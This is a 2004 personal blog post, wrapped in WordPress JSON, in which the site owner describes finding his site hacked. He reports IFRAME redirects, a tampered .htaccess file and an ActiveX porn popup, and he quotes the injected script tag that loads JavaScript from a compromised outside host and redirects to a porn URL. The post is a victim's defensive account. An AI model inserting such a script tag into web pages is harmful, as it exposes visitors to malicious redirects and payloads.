{"id":3070,"date":"2004-10-15T23:48:00","date_gmt":"2004-10-16T03:48:00","guid":{"rendered":"https:\/\/wastinaway.net\/shortfatguy\/?p=3070"},"modified":"2021-06-04T23:56:45","modified_gmt":"2021-06-05T03:56:45","slug":"ive-been-hacked","status":"publish","type":"post","link":"https:\/\/wastinaway.net\/shortfatguy\/2004\/10\/15\/ive-been-hacked\/","title":{"rendered":"I&#8217;ve Been Hacked"},"content":{"rendered":"\n<img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/wastinaway.net\/shortfatguy\/images\/blogbug.gif?resize=65%2C20&#038;ssl=1\" width=\"65\" height=\"20\">&nbsp; &nbsp; Coincidental with my having the week off, I&#8217;ve been noticing bizarre behavior in regards to my site. Since I&#8217;m using a Mac I didn&#8217;t encounter anything outright, but my browser was downloading little &#8220;2DimensionOfExploitsEnc.php&#8221; files. Most often these text files would be blank, but occasionally I&#8217;d see some text. Yesterday I discovered an IFRAME was being added to my site, redirecting people to <b><u>newiframe.biz<\/u><\/b>. Today, I was seeing redirects to a site called <b>Lahrah&#8217;s World<\/b>, at <b><u>elleseebee.com<\/u><\/b>. Wanting to avoid any IFRAME trouble, I removed my Shoutbox and my online poll; but I restored them by the end of the day.<br>&nbsp; &nbsp; What really got my attention was discovering something was <I><u>adding<\/u> code<\/i> to my site! At the bottom of almost every page I was finding:<pre>&lt;script language=\"JavaScript\" src=\"http:\/\/www.wizardsworldwide.com\/\\nchat\/chat\/localization\/czech\/catalog\/spacer.gif?i\\n=0c2a602a840a150cb337e2406913b775&to=\\nhttp:\/\/www.fucklynx.com\/lynx\/Boobs\/bigtits.html\"&gt;&lt;\/script&gt;<\/pre>&nbsp; &nbsp; Interestingly, Wizards Worldwide appears to be a Harry Potter chat site. I wonder if the kids who avail themselves of it know it&#8217;s apparently a front for Czech hackers.<br>&nbsp; &nbsp; This was curious, but it still didn&#8217;t raise any alarm bells. It wasn&#8217;t till I looked at my webpage with a Windows browser that i found cause for alarm.  As soon as it loaded in Internet Explorer, I was confronted with an Active X popup window asking me to click &#8220;OK&#8221; for free porn movies. My site had really been hacked.<br>&nbsp; &nbsp; There was no way I could allow this upon unsuspecting visitors. It&#8217;s one thing to accost them with dreadful content and halfbaked jokes. It&#8217;s another to force illegal porn sites on them. I had little idea how to solve the problem &#8212; you really should need a license to operate a website &#8212;  so it seemed simpler to redirect the webpage myself. It was safer to simply steer people away. So, I edited my &#8220;.htaccess&#8221; file to send all visitors to <a href=\"http:\/\/www.google.com\" target=\"_blank\" rel=\"noopener\">Google<\/a>. Then, since we&#8217;re nearing the end of the campaign trail, I wanted to get some last digs in by pointing to <a href=\"http:\/\/www.buzzflash.com\" target=\"_blank\" rel=\"noopener\">BuzzFlash<\/a>. In the process I discovered someone had been monkeying with the &#8220;.htaccess&#8221; file. I fixed this and was thus able to restore access to my pMachine control panel &#8212; hence this update. It did not solve the problem with that JavaScript code, which, damn it all, is still showing up at the bottom of every page.<br>&nbsp; &nbsp; I&#8217;ll keep investigating. The blog will remain offline. And, in the interests of avoiding any similar problems from other ignorant amateur webmasters, all I can say is use <a href=\"http:\/\/www.mozilla.org\">Mozilla<\/a> or get a <a href=\"http:\/\/www.apple.com\">Mac<\/a>. (Or, perhaps, stay away from Microsoft software, even <i>on<\/i> a <a href=\"http:\/\/www.apple.com\" target=\"_blank\" rel=\"noopener\">Mac<\/a>.)\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; &nbsp; Coincidental with my having the week off, I&#8217;ve been noticing bizarre behavior in regards to my site. Since I&#8217;m using a Mac I didn&#8217;t encounter anything outright, but my browser was downloading little &#8220;2DimensionOfExploitsEnc.php&#8221; files. Most often these &hellip; <a href=\"https:\/\/wastinaway.net\/shortfatguy\/2004\/10\/15\/ive-been-hacked\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"nf_dc_page":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[9,16],"tags":[],"class_list":["post-3070","post","type-post","status-publish","format-standard","hentry","category-blog","category-me"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/posts\/3070","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/comments?post=3070"}],"version-history":[{"count":4,"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/posts\/3070\/revisions"}],"predecessor-version":[{"id":3074,"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/posts\/3070\/revisions\/3074"}],"wp:attachment":[{"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/media?parent=3070"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/categories?post=3070"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/wastinaway.net\/shortfatguy\/wp-json\/wp\/v2\/tags?post=3070"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}